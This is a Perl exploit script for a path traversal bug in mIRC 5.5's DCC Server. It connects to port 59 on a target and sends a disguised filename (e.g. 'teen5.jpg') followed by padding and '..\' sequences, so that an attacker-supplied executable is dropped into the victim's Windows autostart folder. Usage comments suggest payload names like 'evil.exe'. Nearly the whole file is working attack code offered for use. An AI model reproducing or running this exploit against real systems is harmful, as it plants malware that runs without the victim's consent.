#!/usr/bin/perl # Mirc 5.5 'DCC Server' pathbug(balu) tool. - typo@inferno.tusculum.edu # # bug description: mirc 5.5's newly introduced dcc server feature doesn't # filter metachars(such as . and \) from sent filenames. this script fakes the # sending of a harmless file and then puts malicious file in a wanted # destination dir on the same harddrive (autostart dir is a good choice) # # usage: ./balu.pl <(any)nick> # # # use IO::Socket; $host = shift or die 'need a host to connect to.'; chomp $host; $nick = shift or die 'need source nick (e.g. satan)'; chomp $nick; $file = shift or die 'need a file to send (eg: ./evil.exe).'; chomp $file; $ffile = shift or die 'need a fake filename to send (eg: teen5.jpg).'; chomp $ffile; $rfile = shift or die 'need remote filename+path, eg(including the \'\'s): \'windows\startm~1\progra~1\autostart\bla.exe\' (which is the path of autostart in german win95)'; chomp $rfile; ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,$atime,$mtime,$ctime,$blksize,$blocks) = stat($file); $mysock = IO::Socket::INET->new("$host:59") or die "can't connect to $host:59"; #$mysock->send("100 bla\n"); defined $mysock -> send("120 $nick $size $ffile" . ' ' x 74 . '\..\..\..\..\..\\' . $rfile); FOO: while (defined $mysock) { $mysock->recv($bla,1); last FOO if $bla eq "\n"; $foo .= $bla; goto exit if (!defined $mysock); goto exit if (!defined $bla); } ($f1,$f2,$f3) = split(/ /,$foo, 3); print "Nick of receiver: $f2 - Resume requested at offset: $f3\n"; if ($f3 != 0) { print "Error: $f2 wants to resume.. aborting! Try another remote filename.\n"; goto exit; } print "sending... "; open(FILE,$file); while () { $mysock->send($_); } exit: print "done.\n"; $mysock->close;